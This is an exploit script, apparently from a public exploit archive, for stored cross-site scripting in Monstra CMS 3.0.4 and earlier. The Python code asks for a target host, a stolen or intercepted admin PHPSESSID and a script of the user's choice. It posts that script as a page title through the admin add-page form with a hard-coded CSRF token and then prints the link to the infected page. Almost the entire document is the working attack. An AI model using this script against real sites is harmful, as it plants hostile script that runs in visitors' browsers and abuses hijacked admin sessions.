# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting
# Date: 2018-06-07
# Author: DEEPIN2
# Software: Monstra CMS
# Version: 3.0.4 and earlier
# This automation code requires Python3
# You must intercept the first request through the proxy tool to verify the CSRF token.
import requests
import re
def runXSS(target, cookie, data):
exploit = requests.post(target, cookies=cookie, data=data).text
if re.search('exploit', exploit):
return 'OK'
else:
return 'ERROR'
if __name__ == '__main__':
print(''' ______ _______ ____ ___ _ ___ _ ___ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \/ |( _ ) / |/ _ \/ / |( _ )
| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
\____| \_/ |_____| |_____|\___/|_|\___/ |_|\___/|_|_|\___/
[*] Author : DEEPIN2(Junseo Lee)
---------------------------------------------------------------------''')
print('[*] Ex) http://www.target.com -> www.target.com')
url = input('Target : ')
print('[*] Required admin\'s PHPSESSID.')
PHPSESSID = input('PHPSESSID : ')
pagename = input('Pagename : ')
script = input('Script : ')
target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
cookie = {'PHPSESSID':PHPSESSID}
data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
'page_title':script,\
'page_name':pagename,\
'page_meta_title':'',\
'page_keywords':'',\
'page_description':'',\
'pages':0,\
'templates':'index',\
'status':'published',\
'access':'public',\
'editor':'',\
'page_tags':'',\
'add_page_and_exit':'Save+and+Exit',\
'page_date':'9999-99-99'}
result = runXSS(target, cookie, data)
print('-' * 69)
if result == 'OK':
print('[+] LINK : http://' + url + '/' + pagename)
else:
print('[-] Error')